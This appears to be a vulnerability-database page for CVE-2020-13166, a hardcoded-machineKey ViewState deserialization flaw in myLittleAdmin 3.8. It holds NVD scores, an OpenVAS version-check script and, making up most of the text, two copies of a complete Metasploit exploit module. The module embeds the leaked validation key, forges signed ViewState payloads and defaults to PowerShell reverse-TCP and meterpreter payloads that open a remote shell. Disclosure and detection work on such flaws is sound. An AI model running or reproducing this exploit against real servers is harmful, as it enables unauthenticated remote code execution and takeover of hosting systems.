Description
The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.
Affected Software
Related
{"id": "CVE-2020-13166", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-13166", "description": "The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.", "published": "2020-05-19T20:15:00", "modified": "2022-04-26T19:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13166", "reporter": "cve@mitre.org", "references": ["https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", "http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html"], "cvelist": ["CVE-2020-13166"], "immutableFields": [], "lastseen": "2022-04-26T22:15:35", "viewCount": 162, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:62ACA1A2-F48C-4702-9D23-1D94F589D05B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310144088"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157808"]}, {"type": "zdt", "idList": ["1337DAY-ID-34477"]}]}, "score": {"value": 7.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:62ACA1A2-F48C-4702-9D23-1D94F589D05B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310144088"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157808"]}, {"type": "zdt", "idList": ["1337DAY-ID-34477"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "mylittletools mylittleadmin", "version": 3}]}, "vulnersScore": 7.1}, "_state": {"dependencies": 1659876597, "score": 1659878424, "affected_software_major_version": 1671590614}, "_internal": {"score_hash": "295ab6020e4395a0b29efa67019e34ee"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:mylittletools:mylittleadmin:3.8"], "cpe23": ["cpe:2.3:a:mylittletools:mylittleadmin:3.8:*:*:*:*:*:*:*"], "cwe": ["CWE-798"], "affectedSoftware": [{"cpeName": "mylittletools:mylittleadmin", "version": "3.8", "operator": "eq", "name": "mylittletools mylittleadmin"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:mylittletools:mylittleadmin:3.8:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", "name": "https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html", "name": "http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"openvas": [{"lastseen": "2020-06-10T17:59:45", "description": "myLittleAdmin is prone to an unauthenticated remote code execution vulnerability.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "openvas", "title": "myLittleAdmin <= 3.8 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13166"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310144088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310144088", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:mylittletools:mylittleadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.144088\");\n script_version(\"2020-06-09T04:06:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 04:06:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-09 03:59:10 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2020-13166\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_name(\"myLittleAdmin <= 3.8 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mylittleadmin_http_detect.nasl\");\n script_mandatory_keys(\"mylittleadmin/detected\");\n\n script_tag(name:\"summary\", value:\"myLittleAdmin is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The management tool in MyLittleAdmin allows remote attackers to execute\n arbitrary code because the machineKey is hardcoded (the same for all customers' installations) in web.config,\n and can be used to send serialized ASP code.\");\n\n script_tag(name:\"affected\", value:\"myLittleAdmin version 3.8 and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 09th June, 2020.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less_equal(version: version, test_version: \"3.8\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:15:53", "description": "The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers\u2019 installations) in web.config, and can be used to send serialized ASP code.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 21, 2020 5:50am UTC reported:\n\nMetasploit exploit module PR\u2019d [here](<https://github.com/rapid7/metasploit-framework/pull/13494>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-19T00:00:00", "type": "attackerkb", "title": "CVE-2020-13166", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13166"], "modified": "2020-07-30T00:00:00", "id": "AKB:62ACA1A2-F48C-4702-9D23-1D94F589D05B", "href": "https://attackerkb.com/topics/DoTzdzLcQ3/cve-2020-13166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-23T01:21:13", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-26T00:00:00", "type": "zdt", "title": "Plesk/myLittleAdmin - ViewState .NET Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13166"], "modified": "2020-05-26T00:00:00", "id": "1337DAY-ID-34477", "href": "https://0day.today/exploit/description/34477", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n # <input type=\"hidden\" name=\"__VIEWSTATEGENERATOR\" id=\"__VIEWSTATEGENERATOR\" value=\"CA0B0334\" />\n VIEWSTATE_GENERATOR = 'CA0B0334'.freeze\n\n # <machineKey\n # validationKey=\"5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF\"\n # decryptionKey=\"DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4\"\n # validation=\"SHA1\" />\n VIEWSTATE_VALIDATION_KEY =\n \"\\x5c\\x7e\\xef\\x66\\x50\\x63\\x9d\\x2c\\xb8\\xfa\\xa0\\xda\\x36\\xaf\\x24\\x45\\x2d\\xcf\" \\\n \"\\x69\\x06\\x5f\\x2e\\xdc\\x2c\\x8f\\x2f\\x44\\xc0\\x22\\x0b\\xe2\\xe5\\x88\\x9c\\xa0\\x1a\" \\\n \"\\x20\\x7f\\xc5\\xfc\\xe6\\x2d\\x1a\\x5a\\x4f\\x6d\\x24\\x10\\x72\\x22\\x61\\xe6\\xa3\\x3e\" \\\n \"\\x77\\xe0\\x62\\x8b\\x17\\xaa\\x92\\x80\\x39\\xbf\".freeze\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::ViewState\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',\n 'Description' => %q{\n This module exploits a ViewState .NET deserialization vulnerability in\n web-based MS SQL Server management tool myLittleAdmin, for version 3.8\n and likely older versions, due to hardcoded <machineKey> parameters in\n the web.config file for ASP.NET.\n\n Popular web hosting control panel Plesk offers myLittleAdmin as an\n optional component that is selected automatically during \"full\"\n installation. This exploit caters to the Plesk target, though it\n should work fine against a standalone myLittleAdmin setup.\n\n Successful exploitation results in code execution as the user running\n myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as\n the \"SQL Admin MSSQL anonymous account.\"\n\n Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.\n },\n 'Author' => [\n # Reported to SSD (SecuriTeam) by an anonymous researcher\n # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam)\n 'Spencer McIntyre', # Inspiration\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-13166'],\n ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],\n ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']\n ],\n 'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n ],\n [\n 'Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n [\n 'PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'WfsDelay' => 10 # First exploit attempt may be a little slow\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')\n return CheckCode::Unknown('Target is not running myLittleAdmin.')\n end\n\n vprint_good(\"myLittleAdmin is running at #{full_uri}\")\n check_viewstate(res.get_html_document)\n end\n\n def check_viewstate(html)\n viewstate = html.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text\n\n unless viewstate\n return CheckCode::Detected(\"__VIEWSTATE not found, can't complete check.\")\n end\n\n @viewstate_generator =\n html.at('//input[@id = \"__VIEWSTATEGENERATOR\"]/@value')&.text\n\n unless @viewstate_generator\n print_warning('__VIEWSTATEGENERATOR not found, using known default value')\n @viewstate_generator = VIEWSTATE_GENERATOR\n end\n\n # ViewState generator needs to be a packed integer now\n @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')\n\n we_can_sign_viewstate = can_sign_viewstate?(\n viewstate,\n extra: @viewstate_generator,\n key: VIEWSTATE_VALIDATION_KEY\n )\n\n if we_can_sign_viewstate\n return CheckCode::Vulnerable('We can sign our own ViewState.')\n end\n\n CheckCode::Safe(\"We can't sign our own ViewState.\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Serializing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_post' => {\n # This is the only parameter we need for successful exploitation!\n '__VIEWSTATE' => generate_viewstate_payload(\n cmd,\n extra: @viewstate_generator,\n key: VIEWSTATE_VALIDATION_KEY\n )\n }\n )\n\n unless res && res.code == 302 && res.redirection.path == '/error/index.html'\n fail_with(Failure::PayloadFailed, \"Could not execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34477", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-05-26T01:49:33", "description": "", "cvss3": {}, "published": "2020-05-22T00:00:00", "type": "packetstorm", "title": "Plesk / myLittleAdmin ViewState .NET Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-13166"], "modified": "2020-05-22T00:00:00", "id": "PACKETSTORM:157808", "href": "https://packetstormsecurity.com/files/157808/Plesk-myLittleAdmin-ViewState-.NET-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \n# <input type=\"hidden\" name=\"__VIEWSTATEGENERATOR\" id=\"__VIEWSTATEGENERATOR\" value=\"CA0B0334\" /> \nVIEWSTATE_GENERATOR = 'CA0B0334'.freeze \n \n# <machineKey \n# validationKey=\"5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF\" \n# decryptionKey=\"DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4\" \n# validation=\"SHA1\" /> \nVIEWSTATE_VALIDATION_KEY = \n\"\\x5c\\x7e\\xef\\x66\\x50\\x63\\x9d\\x2c\\xb8\\xfa\\xa0\\xda\\x36\\xaf\\x24\\x45\\x2d\\xcf\" \\ \n\"\\x69\\x06\\x5f\\x2e\\xdc\\x2c\\x8f\\x2f\\x44\\xc0\\x22\\x0b\\xe2\\xe5\\x88\\x9c\\xa0\\x1a\" \\ \n\"\\x20\\x7f\\xc5\\xfc\\xe6\\x2d\\x1a\\x5a\\x4f\\x6d\\x24\\x10\\x72\\x22\\x61\\xe6\\xa3\\x3e\" \\ \n\"\\x77\\xe0\\x62\\x8b\\x17\\xaa\\x92\\x80\\x39\\xbf\".freeze \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::ViewState \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization', \n'Description' => %q{ \nThis module exploits a ViewState .NET deserialization vulnerability in \nweb-based MS SQL Server management tool myLittleAdmin, for version 3.8 \nand likely older versions, due to hardcoded <machineKey> parameters in \nthe web.config file for ASP.NET. \n \nPopular web hosting control panel Plesk offers myLittleAdmin as an \noptional component that is selected automatically during \"full\" \ninstallation. This exploit caters to the Plesk target, though it \nshould work fine against a standalone myLittleAdmin setup. \n \nSuccessful exploitation results in code execution as the user running \nmyLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as \nthe \"SQL Admin MSSQL anonymous account.\" \n \nTested on the latest Plesk Obsidian with optional myLittleAdmin 3.8. \n}, \n'Author' => [ \n# Reported to SecuriTeam SSD by an anonymous researcher \n# Reference exploit written by said anonymous researcher \n# Publicly disclosed by Noam Rathaus of SecuriTeam's SSD \n'Spencer McIntyre', # Inspiration \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-13166'], \n['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'], \n['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw'] \n], \n'DisclosureDate' => '2020-05-15', # SecuriTeam SSD advisory \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n], \n[ \n'Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n], \n[ \n'PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'SSL' => true, \n'WfsDelay' => 10 # First exploit attempt may be a little slow \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check request.') \nend \n \nunless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server') \nreturn CheckCode::Unknown('Target is not running myLittleAdmin.') \nend \n \nvprint_good(\"myLittleAdmin is running at #{full_uri}\") \ncheck_viewstate(res.get_html_document) \nend \n \ndef check_viewstate(html) \nviewstate = html.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text \n \nunless viewstate \nreturn CheckCode::Detected(\"__VIEWSTATE not found, can't complete check.\") \nend \n \n@viewstate_generator = \nhtml.at('//input[@id = \"__VIEWSTATEGENERATOR\"]/@value')&.text \n \nunless @viewstate_generator \nprint_warning('__VIEWSTATEGENERATOR not found, using known default value') \n@viewstate_generator = VIEWSTATE_GENERATOR \nend \n \n# ViewState generator needs to be a packed integer now \n@viewstate_generator = [@viewstate_generator.to_i(16)].pack('V') \n \nwe_can_sign_viewstate = can_sign_viewstate?( \nviewstate, \nextra: @viewstate_generator, \nkey: VIEWSTATE_VALIDATION_KEY \n) \n \nif we_can_sign_viewstate \nreturn CheckCode::Vulnerable('We can sign our own ViewState.') \nend \n \nCheckCode::Safe(\"We can't sign our own ViewState.\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Serializing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'vars_post' => { \n# This is the only parameter we need for successful exploitation! \n'__VIEWSTATE' => generate_viewstate_payload( \ncmd, \nextra: @viewstate_generator, \nkey: VIEWSTATE_VALIDATION_KEY \n) \n} \n) \n \nunless res && res.code == 302 && res.redirection.path == '/error/index.html' \nfail_with(Failure::PayloadFailed, \"Could not execute command: #{cmd}\") \nend \n \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157808/plesk_mylittleadmin_viewstate.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}